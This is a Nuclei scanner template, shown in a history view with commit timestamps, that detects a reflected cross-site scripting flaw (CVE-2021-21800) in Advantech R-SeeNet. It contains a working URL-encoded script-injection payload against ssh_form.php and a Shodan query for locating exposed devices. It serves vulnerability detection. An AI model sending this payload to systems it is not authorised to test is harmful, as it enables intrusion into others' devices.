nuclei-templates/cves/2021/CVE-2021-21800.yaml

38 lines
1.0 KiB
YAML
Raw Normal View History

2022-08-05 05:56:37 +00:00
id: CVE-2021-21800
info:
name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the ssh_form.php script functionality.
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271
2022-08-05 06:20:39 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21800
- https://nvd.nist.gov/vuln/detail/CVE-2021-21800
2022-08-05 05:56:37 +00:00
metadata:
2022-08-05 23:51:05 +00:00
verified: true
2022-08-05 06:20:39 +00:00
shodan-query: http.html:"R-SeeNet"
2022-08-05 23:51:05 +00:00
tags: cve,cve2021,xss,r-seenet
2022-08-05 05:56:37 +00:00
requests:
- method: GET
path:
2022-08-05 06:20:39 +00:00
- "{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"
2022-08-05 05:56:37 +00:00
matchers-condition: and
matchers:
- type: word
2022-08-05 06:20:39 +00:00
part: body
2022-08-05 23:51:05 +00:00
words:
- "<title>SSH Session </title><script>alert(document.domain)</script><title></title>"
2022-08-05 05:56:37 +00:00
- type: word
2022-08-05 23:51:05 +00:00
part: header
2022-08-05 05:56:37 +00:00
words:
2022-08-05 06:20:39 +00:00
- "text/html"
2022-08-05 05:56:37 +00:00
- type: status
status:
- 200